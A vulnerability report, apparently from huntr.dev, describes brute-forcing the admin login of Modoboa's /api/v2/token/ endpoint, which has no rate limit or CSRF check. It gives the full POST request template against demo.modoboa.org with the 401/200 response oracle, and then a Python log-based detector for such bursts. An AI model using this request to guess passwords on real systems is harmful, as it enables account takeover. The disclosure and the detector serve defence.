huntr / 7h3h4ckv157 / A17E7A9F-0FEE-4130-A522-5A0466FC17C7
History: Jan 26, 2023 - 6:43 p.m.

Admin TakeOver

2023-01-26 18:43:28
7h3h4ckv157
www.huntr.dev
15
endpoint security
csrf token
unauthorized access

EPSS

0.028

Percentile

90.8%

Description

The endpoint /api/v2/token/ allows an unauthorized user to brute-force credentials: the app does not block the request even though it carries no session cookie or CSRF token.

Request


POST /api/v2/token/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------25524418606542250161357131552
Content-Length: 301
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Gpc: 1
Te: trailers
Connection: close

-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="username"

admin
-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="password"

{PASSWORD-HERE}
-----------------------------25524418606542250161357131552--

This request returns one of two response codes:

--> HTTP/1.1 401 Unauthorized :: for an incorrect password
--> HTTP/1.1 200 OK :: for the correct password
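Because the endpoint answers 401 for a wrong password and 200 for the right one with no throttling, the defender-side signal is a burst of 401s on POST /api/v2/token/ from one client, optionally followed by a 200. The following detector is an added example written for this page, not part of the original report and not Modoboa's own code; it assumes combined-format access logs, a threshold of 5 failures per 60-second window, and the sample log lines below are constructed (IPs, timestamps and user agent are made up).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TOKEN_PATH = "/api/v2/token/"

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (assumption: not real traffic). 203.0.113.7 hammers the
# token endpoint and finally gets a 200; 198.51.100.20 is a user who mistyped once.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jan/2023:18:40:01 +0000] "POST /api/v2/token/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2023:18:40:02 +0000] "POST /api/v2/token/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2023:18:40:03 +0000] "POST /api/v2/token/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2023:18:40:04 +0000] "POST /api/v2/token/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2023:18:40:05 +0000] "POST /api/v2/token/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2023:18:40:06 +0000] "POST /api/v2/token/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2023:18:40:07 +0000] "POST /api/v2/token/ HTTP/1.1" 200 214 "-" "Mozilla/5.0"
198.51.100.20 - - [26/Jan/2023:18:41:10 +0000] "POST /api/v2/token/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
198.51.100.20 - - [26/Jan/2023:18:41:25 +0000] "POST /api/v2/token/ HTTP/1.1" 200 214 "-" "Mozilla/5.0"
192.0.2.9 - - [26/Jan/2023:18:42:00 +0000] "GET /user/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return (ip, timestamp, method, path, status) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def detect_token_bruteforce(lines, threshold=5, window_seconds=60):
    """Return alerts as (kind, ip, recent_failures, iso_timestamp) tuples.

    'burst' fires once per IP when it reaches `threshold` 401s on the token endpoint
    inside a sliding window; 'success_after_burst' fires when a 200 arrives while the
    window still holds at least `threshold` failures (a likely credential guess that landed).
    """
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)  # ip -> timestamps of recent 401s
    alerted = set()                # ips already reported for a burst
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, status = parsed
        if method != "POST" or path != TOKEN_PATH:
            continue
        recent = failures[ip]
        while recent and ts - recent[0] > window:  # drop failures older than the window
            recent.popleft()
        if status == 401:
            recent.append(ts)
            if len(recent) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append(("burst", ip, len(recent), ts.isoformat()))
        elif status == 200 and len(recent) >= threshold:
            alerts.append(("success_after_burst", ip, len(recent), ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for alert in detect_token_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against the constructed log, the detector flags 203.0.113.7 twice (the burst, then the 200 that follows it) and stays silent for the user who mistyped once, which is the behaviour a rate limit on the endpoint would be expected to enforce server-side.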

Proof Of Concept

Proof-of-concept screenshot: poc.png (image not reproduced in this text)
